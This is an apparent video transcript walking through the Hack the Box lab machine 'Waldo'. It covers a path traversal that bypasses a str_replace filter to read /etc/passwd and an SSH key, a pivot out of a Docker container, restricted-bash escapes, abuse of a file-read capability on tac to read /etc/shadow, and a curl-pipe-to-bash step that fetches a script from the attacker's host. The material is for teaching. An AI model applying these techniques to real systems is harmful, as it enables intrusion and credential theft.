What's going on YouTube? This is Ipsec. I'm doing Waldo from Hack the Box, which was a really fun box. The only thing I didn't like about it is there's no way to actually get a shell as root. You're limited to just reading files. But it does have a lot of cool things like Docker, a fun web application, escaping restricted bash, and then Linux capabilities, which I haven't seen in Hack the Box before, which is awesome. So the web application's pretty simple and has a bad character filter to try to limit path traversal, but there's a way to bypass that. So you do that, and then you get an SSH key. You can log into the box, which you find out you're in a Docker container. And then from that Docker container, you can SSH into the host. But when you do that, you're in restricted bash. There's two ways around that restricted bash to break out of it. And then you have to abuse something called Linux capabilities, which is a way to do granular permissions on Linux. So instead of like set UID, which just grants you root, you can say, hey, this user on this binary has a way to read files as root. So if they exploit it, they don't get a root shell because they only had permission to read files. So with all that said, let's just jump in. As always, we'll start off with the nmap. So nmap-sc for default scripts, sv, enumerate versions, OA, output all formats, put in the nmap directory and call it Waldo, and the IP address, which is 10.10.10.87. It's going to take some time to run, so I've already run it. Looking at the results, we don't really have that much information. We have SSH listening on port 22. Its version is OpenSSH 7.5. It's not leaking any information, which can help us identify what OS it's running. We also have Nginx listening on port 80, and I don't really care about the versions of Nginx because there's just not many vulnerabilities in Nginx itself, so we can just safely ignore that. The other interesting thing is we have a port 8888 that's responding as filtered. And I've said this in a previous video, but filtered just means the OS didn't send us a packet back when we sent a request on this. Typically, when you make a request to a port the OS is not listening on, it sends you a reset packet back, and that tells you that the port is not listening. When it doesn't send you anything at all, that's interesting because this means there's a firewall here configured to drop the packet and just silently do nothing. So let's just take a look at this behavior with TCP dump. And before I do that, I'm going to edit my host file, and I'm going to do 10.10.14.2, which is my IP. And I'm going to put this as IPsec, and then we'll do 10.10.10.87 and put this as Waldo. And the reason why I'm doing this is just so TCP dump will do some DNS resolution and show us client and server, and it'll just make it easier to see. So let's open up a new pane, go down here, we can do TCP dump -I ton 0. This is the interface for my VPN connection. And now we can do a netcat to 10.10.10.87 and port 80 to see what a normal connection looks like. So we see IPsec, that is me, sent a request to Waldo, and that request is a HTTP. And it did that by sending a SYN packet. Then Waldo sends a packet back to me, and that is a SYN ACK. And then I acknowledge that SYN ACK by sending Waldo an ACK. So this is your typical three-way handshake for TCP. If I Control-C this, we'll see me sending a FIN packet back. It sends a FIN ACK, and then I acknowledge that and close out. So that is a normal TCP connection. So let's clear that again, and we'll do it to a port that is not listening. So we'll do Elite 31337. We see IPsec sends a port packet to Waldo, port 31337, and it's just a SYN packet. Waldo responds with a reset, and just that's where it dies. It just tells us, hey, this port isn't listening, go away. So do one last thing, and we'll do port 8888. So put quad 8s here, and we see I am sending a packet to Waldo, port 8888, the SYN packet again, and I'm just doing this multiple times because I'm not hearing anything back. So Waldo just dropped this, and that's indication that there's a firewall that did something odd, and when a firewall is configured on a specific port, that typically means maybe something's listening and it's just not listening to me. So just interesting behavior. Keep this in the back of your mind as we keep going on through this box. So let us look at what port 80 looks like. Open up Firefox and let's go to 10.10.10.87 and we get a weird looking web page. So we always want to do some type of recon in the background as we progress. So let's start up GoBuster. So GoBuster-H so we can see all the options. U for URL, so HTTP 10.10.10.87-W for word list. We want user share word list, then dirbuster and directory list 2.3 medium. Start this up, and we see it dies right away. And we have a wildcard response found. So whenever we send a request, it sends us a response back. So let's just demonstrate this behavior. Curl 10.10.10.87 / please subscribe. And we'll put random junk at the end because this file definitely shouldn't exist on the server. We don't see anything back. If we do curl-v, we can see us requesting the file, and then the server responds with a 302 saying, hey, go to /list.html. So let's go back to our GoBuster command, and what we want to do is say the status codes that report the page is good do not have 302 in it. So let's take all of these, remove the 302 redirect, and now GoBuster isn't stopping immediately because it's ignoring 302s. So it's treating 302 as it treated like 404, if that makes sense. So let's go play around with this page. We can click a button called Add List, delete, clicking this, and it looks like a weird page. Whenever we're clicking anything, our URL isn't changing, which is annoying because if we click back, it brings us all the way back. So let's go and investigate exactly what's happening with burp. So turn intercept on with, this is Foxy Proxy, and I was just making sure the intercept button says intercept on, and let's click a button. So let's click delete, and we see we're making a post request and deleting list num4 because I clicked on delete on list 4. So if we forward this, we'll then do a post request to dirread.php on .list. So if we forward this, we get this. So let's see what is in .list. So because we did a directory read on this file, we get 404 forbidden. So let's try .list/list1, 403 forbidden. Everything is doing 403 forbidden. Let's try list1.html. So doesn't look like we can request that page. So let's go in HTTP history. Let's see. We have dir read, file delete. So let's just click around, see if we can get all the PHP scripts. If we go to target, this would be a better way to view it than HTTP history. So click around this page and see what happens. Click back, click add here, new item, delete, delete here. Let's go back to history, and we have 4 different files: file write, file read, file delete, and directory read. So I'm going to click on each of these and press Ctrl-R to send this into my repeater tab. So sending all of them in, and then let's just rename by double clicking up here. This is dir read. 2 is going to be file delete. 3 is going to be file read. And 4 is going to be file write. Okay, so reading files. Oh, this is a GET. We want post request. So delete these. Go back to proxy, or my target. File delete. Why did it send the GET request? That was odd. Okay. Maybe I should just make sure I click it. There we go. And let's do the last one. File write here. Okay. So now we got post request everywhere. So let's redo this rename. So let's do file read and then 7, which is file write. So I want to read like etc past wd because that'll just prove we have directory traversal. So I'm going to change file to a bunch of dot dot slashes and then etc past wd. Click and go. We get file false. So press Control Z. We get list 1, file false, list 2, list 3. So let's look at what directory read is real quick on list. So list 1 and list 2 exist. File read, list 1, list 2, and list 3. Does that exist? So I'm not exactly sure how this is reading files, but if it exists, we are getting something back. So let's try file is equal to file read.php. Can we read ourselves? And the answer is yes. So we're getting the PHP source code back. It looks a bit ugly, so let us pipe this into a tool in Kali called JQ to read JSON strings. So if I do curl-s http 10.10.10.87 / was it file read.php -d for data, and we want to send file is equal to /file read.php. So file is equal to file read.php, and we get this back. And I do know Burp does have something where we can copy as a curl command, but it puts so many flags here it looks ugly, and I don't like that when I'm playing with it. So we can pipe this to something called JQ. If you don't have this, this is in the apt repository. And then if we do -r for raw, and then we just say dot, and then select the object, which is file, it will print it out. So we can easily see what this script is doing. We have if the request method is post, set file content to false, set the header, and if post is set, do this. And I'm guessing down here, let's see, file content file. So down this if chain, if the file is set, we're setting something here, and at the end, we're just echoing that file content variable. So that's why when a file doesn't exist, it's getting false. So let's go down here. We have a str replace .. / and replace it with nothing. So this is that blacklist feature that we had while we couldn't go into etc past wd. Now, the issue with this is str replace. This isn't recursive, which means it's only going to run once. So essentially, we have .. str replace says, nope, get rid of that, replace it with nothing. If we do .. and within this .. str replace will run against the string, remove .. and create a new .. and it doesn't run it again to remove all repeat occurrences. So let's test this theory out by going back into Burp, and let's try file read, and let's do .. and put 2 slashes here. So again, it's going to remove .. leaving .. So 4 dots. Just copy this. I want to say that's 4 dots. 1, 2, 3, 4. Yep. So do a few of those, then etc past wd, and we'll see if it reads this. And there we go. So if we go back to our curl command and say -d file read, let's get rid of this, copy this, paste it in. We can see now we can read etc past wd. And again, str replace is going and just removing this, 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 this. It removes all the .. creating new .. It's a bit Inception, but that's essentially how it works. And again, if we just do this again, we're going to get false because it removed all those. So we have a way to read files off of the server. So let's test that out with the directory read. So we got path and dir read. So I'm just going to split the pane. That's going to make it a little bit easier to use both file reads and directory reads. So this will be dir read, and this is path. So get rid of all this and say path. Enter, and this is not a jQuery, it just returns an array. So just pipe it to JQ, and we can see the pretty response. So let's do 4 dots again, 2 slashes, and we'll go up one directory, and we can see we're now in /var. So var dub dub dub. Let's go up one more. Move up so we can see all these directories, and we see a .dockern file, which means we're in a Docker environment. So let's see. Other things we can read, let's try going into the home directory. We can see there's a nobody user. So let's go into nobody. There's a .ssh and a user.txt flag. Let's go into .ssh, and we have a looks like authorized keys file and monitor. So let's look at .monitor. It returns false. Let's try a file read command against this. Copy this, paste, and we get a SSH key. So let's copy this. Let's name this as monitor.ssh, paste the key, chmod 600, and now let's try ssh-i, monitor at 10.10.10.87. Oh, whoops. I need to specify the file, monitor.ssh. And we get permission denied right away. So let us try a file read again and go to passwd. I'm just going to press Ctrl-R to recursively search my history, and we have to add these dot slashes. So add all this, and we can see what users exist. We could grep this for no login, and we'll see root has the shell ASH. There is a operator user, a Postgres user, and nobody user. We got the file out of home nobody, so we can try that. So ssh-i, nobody, and we get a shell, and it's Alpine Linux, which is common with Docker. Let us just try all the other users. So let's try Postgres, denied, operator, denied, and let's try root, denied. So we get denied with everything except nobody. So we could get the user.txt, we can read that. If we go to /root, we can't cd to /root. That's weird. It doesn't say permission denied. I guess it's just an Alpine thing. There we go. Permission denied there. The first thing I wanted to do was just check what port 8888 is to see what's happening there. So I'm doing netstat anlp grep 8888. And we see we are listening on every interface, port 8888. And the odd thing is, I'm connected to that port. 10.10.14.2, that is me, and it's connected via port 8888 when we just did an SSH on port 22. We can try another SSH, so confirm this is us SSHing into it, so nobody at 10, 10, 10, 87. And now we'll see 2 of my addresses are connected to this port, which is odd because, again, we're supposed to be connecting on port 22. So that tells us the host is routing to this box. So we make the TCP request to us 22, and we go to 10, 10, 10, 87. Well, it would be us.some ephemeral port to 10, 10, 10, 87, 22. And then that silently forwards us to the Docker. If we do ifconfig, which is 172.17.0.1. And that silently forwards us to 172.17. Did I say 4.1? We'll just say I did. 8888. So that's the logic that's going on. It's also odd to see that the Docker container also has access to 10.10.10.87. So if we do netstat-alnp, let's grep for list to see all listening ports, we see 80, 22, 8888, and 9000. So let's check what 9000 is real quick. Netcat localhost 9000 get slash punt. So not sure exactly what is listening here. Let's try localhost port 22, and we get SSH 2.0 something Debian. So this is a different host banner than on port 8888. I thought it would have responded with the just open SSH 127.0. Guess it doesn't. So, anyways, we have SSH open on port 22. So let us try to let's go back just a little bit and enumerate the SSH banners because I want to show that. So let's do netcat 127.0.0.1 port 22, and on this host let's do netcat 10.10.10.87 port 22. So that is proving that we're doing something funny with routing on that box, what I said before, because port 22 on its external interface says the banner is SSH 2.0 open SSH, and port 22 internally has it as Debian. And we know already the box is Alpine and not Debian, and we can confirm this by going into SSH's config. Let's cat sshd underscore config. Let's do grep-v for anything beginning with a comment, and then grep period to filter out blank lines. And we see SSH is indeed listening on port 8888. So let us go into the home directory again, .ssh. And then there was that .monitor key file. So let's try using ssh-i.monitor on 127.0.0.1 as nobody. Click yes, permission denied. If we cat monitor, we just get RSA private key. If we cat authorized keys, we see the user is indeed actually called monitor. So let's try specifying the user, monitor, and we get into yet another box. It prints a big picture of Waldo, and we see an bash message here. And if we do cd/bin or something, we get path restricted. If we do bash, command not found. So let's do echo path to see what a path is, and bash is restricted bash. So we're in some type of restricted shell, and it's blacklisting a lot of the commands. We can probably run anything within our path. So if we do ls home monitor bin, we got ls most red and our nano. If we look in app dev, we have a few files, And if we look into appdev v0.1, we have one file. So let us look into the permissions on everything to see if we can write any executables. So these are all symlinked. We do ls la on bin ls. We cannot write to it. It's owned by root, read, write, execute, whatnot. So let's try going back to a path, lsla, home monitor app dev. Looking at this, we most likely can write to monitor as long as our group is monitor. If we do group, oh, we don't have the groups command. Or nano on etc passwd, we can see monitor is in group 1001. So let's do etc, I think groups, maybe it's group. There we go. And let's look for 1001. Let's see. 1001 is monitor. So we are indeed in the monitor group. So we should be able to write this file, which is executable. So if we execute this, log monitor, doesn't really do anything. But if we do nano on bin bash, we can, let's see, do control O. Why doesn't it let me change this? That's weird. Let's do restricted ed, write to, what is it? appdev/log monitor. Then quit this. We do log monitor now. We get dir colors not found. We do cd/bin. We can see we have now escaped the shell because we're no longer in our bash. If we echo our path is still the same. So we can't do like anything that's in bin. So if we type bash, we get command not found. One way to fix that is just echo a path on a normal Linux box, and let's set it. So if we copy this, and then we say export path is equal to this, and now we no longer get command not found. So we're in a good shell. So the next step is to do a Linux enumeration to find out exactly any known misconfigurations, I guess you could say. So let's do cd opt lin enum python-m simple http server, and let's curl 10.10.14.2 port 8000 lin enum.sh, pipe it over to bash, and we'll see it running through. So looks like we're hosting Docker. The first thing I'm going to test is my groups to see if I'm in the Docker group, because if I am, I can probably do a privesc that way. But I am not in the Docker group. I'm just in the monitor group. So let's go through this and see what there is. So we have thorough test is set to disabled. This is going to be pretty key. Kernel information, it's compiled relatively recently, probably when this box released, so I'm not going to look into kernel exploits. Host name's Waldo. We can see our group information, SSH, group memberships. We can look at like if any group is in Docker or something. So Steve, Bluetooth, NetDev, PlugDev, Video Dip, Audio Floppy, CD-ROM, Steve. So I'm not really seeing anything that indicates I should be switching to users because everyone's kind of in the same boat as me. It's possible that there may be like a set UID binary in Steve's that I'm just not seeing because I don't have permission into his home directory, but no easy privesks there. Let's look into etc passwd. This is that. Permissions on home directories. Looks like I may even be able to list Steve's directory. So we can see if there's set UID binaries there. Environment variables, path, shells, UMask, bunch of things, not really too interesting. Crons look all default. System D timers, all the default ones. Networking, ARP history, running processes, binary positions, and nothing too interesting. So if we go into home, let's just look at Steve. Nothing there interesting. App dev, nothing at all interesting. The key thing though is it said thorough test were disabled. So let's go and edit Linenum and turn thorough test on. And there's nothing stopping us from just saving the script to the OS and passing the -t flag to include thorough test, but I don't like touching disk if I don't have to, so I'm just going to edit this script to always include thorough test. So let's look at how it does this. And we have if thorough, then thorough test enabled. If we look down here, if thorough is equal to 1. So let's just yank this with Y, go to the top, put, and let's make thorough always equal to 1. There we go. Save this, Python-m, simple HTTP server, and let's go run this again. So curl linenum, pipe it to bash, we have thorough test enabled, and it's going to run a lot more checks. If we wanted to see kind of what checks it runs, we can always go into this directory, grep for thorough is equal to 1. I think that's how they had it. Let's try this on linenum.sh. Let's look at this again. Thorough. What's that if statement look like? Let's just grep for thorough. That would be much easier. So grepping for thorough, we get a bunch of things. We can do -A5 to show 5 lines after every time thorough is referenced. And we want to grab this echo statement that is in various places. So let's grep for echo. And let's get rid of these just \n new lines. So grep-v. We need to put the $ there to signify that's end of line, because some of these that actually print good things have \n in them. And here we can probably get a rough idea of all the thorough checks. This may not be complete because it could have happened after 5 lines of thorough that prints it, but this should be a good starting point of just identifying what type of things it does. So word readable files /home, home directory, SSH keys, set UID files, set GID files, POSIX capabilities, just does a bunch more checks. So let's go over here and just look at the output. So all this stuff we have seen. Contents of etc passwd we've seen. Permissions and home directories. The files not owned by user but writable by group. I think this is a thorough check. I wish it would tell us like T : or something to show it was a thorough check, but we can see the file we had modified to break out of our bash. We can go down. Let's go to like set UID binaries, because those are always interesting. See what can execute as root. Don't really have anything interesting. These all look default. This one says potentially interesting. This looks like a default SSH file. Potentially interesting GUID. I wonder how it finds this. What's that logic like? Let's less linenum. Let's do it in Vim so we have syntax highlighting. Possibly interesting. Let's see. So it's got a binary list. So somewhere we have, yep, nmat perl So it has a bunch of interesting binaries based off of get the frick out bins. So these are ones that you can use to escape shells. So that's why it's interesting. I wonder why SSH is interesting. What was it? Was it here? Interesting. SSH agents. I actually didn't do this when I was going through the box because GTFO bins came after when I did it. So let's see what that is. If we Google, that was weird. Let's disable this. GTFO bins. Go here. What was that file name? SSH-keysign. What is interesting about this? We got shell. Oh. Oh, it's flagging it because of it. SSH is in the binary name. So that's why it's getting flagged. So it's not really that interesting. SSH-keysign and SSH-agent. No binaries match. But SSH allows for shell, file upload, file download, file read. So just a good way to find interesting binaries, and that's what it looks like this Lambda Noom script is doing now. Pretty cool to see that updated. So going down, we have files with POSIX capabilities set, and this is not new, but many people don't really utilize this. These capabilities are like granular permissions in Windows, or just granular permissions in general. So if we wanted to do something like give a user the ability to run TCP dump, but not give him the ability to run that as root, we just wanted him to be able to bind to sockets, you do that through this capability. And you do that because if we go back to this, TCP dump has a way to execute commands. So, yeah. So that's why you'd give them the capability to only bind to the socket. So if they did that with the GTFO bin, they wouldn't be going as root, which is how it would work if it was set UID. So we can see the file user bin tac has the cap dac read search, and the current user has this capability assigned to him. If we wanted to go more into capabilities, we can just type man capabilities and look at the man page for this. So what was it? Cap dac read search. We can see this capability allows us to bypass file read permissions, check directory, and read and execute permissions. So it's telling us what we can do with it. So if we go back, we can do user bin tac. So let's try this. This on Etsy shadow. And it reads shadow and reverses it, which kind of makes sense because tac is the backwards or cat in reverse. So if we do /root, it's a directory, invalid argument. If we did root, let's see if SSH authorized keys exist. It doesn't. We could do root.txt, and I don't want to actually print the contents of that to spoil it, so we can see we do have read access to this. So that is the box. There are a few things I want to show. At least one thing I want to show is a different way to get out of urbash. So let's go all the way back here and to where we were SSHing into Waldo. So sh-i monitor.ssh 10.10.10.87. We have to do nobody here. And let's actually do a tunnel through this. So let's do -L. Let's listen on port 8022, and we'll direct that at 127.0.0.1.22. So now, if we do a new window and we look at what's listening on our local box, ALNP grep 8022, we see we're listening on 8022, and that's going to send it through this SSH connection, and on the return end, it's going to go to 127.0.0.1, which is itself on port 22. So if we do netcat localhost 8022, we see it's that banner we get if we do netcat localhost 8022. Not 8022, 22. And if we did 888 10.10.10.87. That's what I wanted to do. So now we have a tunnel set up to go from our box through the Docker container to 22 on the host. So let's do sh-i monitor.sh, and let's do monitor at localhost 8022. Can I do it that way? Let's specify -p for port. Yes. And now we're SSH'd into where we're at this bash thing. So can't get into bin because it is restricted. But if we look at our profile, let's do rnano.bash rc, go all the way to the bottom, we can see this is where it's setting our path. In restricted bash, you can only execute what is in your path. So, and we can't really change a path because it's read-only in our bash. So if we put a path to anything, we can't change it. But because this file only gets executed in Ubuntu Debian if you have a sudo terminal assigned, we can actually bypass this check. And then after we do it, we'll dig into exactly why that is. So exit this, we'll echo path, and we can see what a path is. And if we do echo path as just a command, we can see our path is user local bin. And our path when we're on the box with an interactive shell is home monitor bin. So if we just echo bash here, we can do cd/bin ls, and we're in the box. So if we do who am I, we're monitor, if config, or ipaddr, we can see we're indeed on Waldo, and we have bypassed our bash. It's a little bit annoying because we don't have a terminal assigned to us. We could do the python-c import pty.spawn bin bash thing. Whoops. Bin bash. And get a terminal this way. Or we could just do the -t flag in SSH. Let's see if it's actually in the help. Let's see. Is -t here? Doesn't look like it. Man SSH. -t to force a sudo terminal allocation. So if we do -t here with bash, we get a terminal and we have bypassed it. The weird thing is, if we look at a path, because we got a interactive shell, it set a path to that bash rc file. But if we echo path, and let's just copy this, and we'll export path is equal to this. Because we're not in our bin, or not our bin, our bash, then the path isn't read-only, and we can just escape it this way. And this works because if we go into Etsy and look, I think the path goes, or how it loads it, it goes to profile, vi, my bad. And then this will execute bash rc. And if we look at bash rc, v etsy bash.bashrc, we have this. If this ps1 variable is empty, return. If you're not running interactively, don't do anything. And ps1 is the prompt string. So if we look at echo ps1, we can see what that looks like. If we exited this all and just did echo, whoops, echo ps1, we can see there is no prompt string. So that variable is empty, It doesn't execute the bash profile, which allows us to execute bash within restricted bash and bypass that. Hopefully that all makes sense. Take care, guys.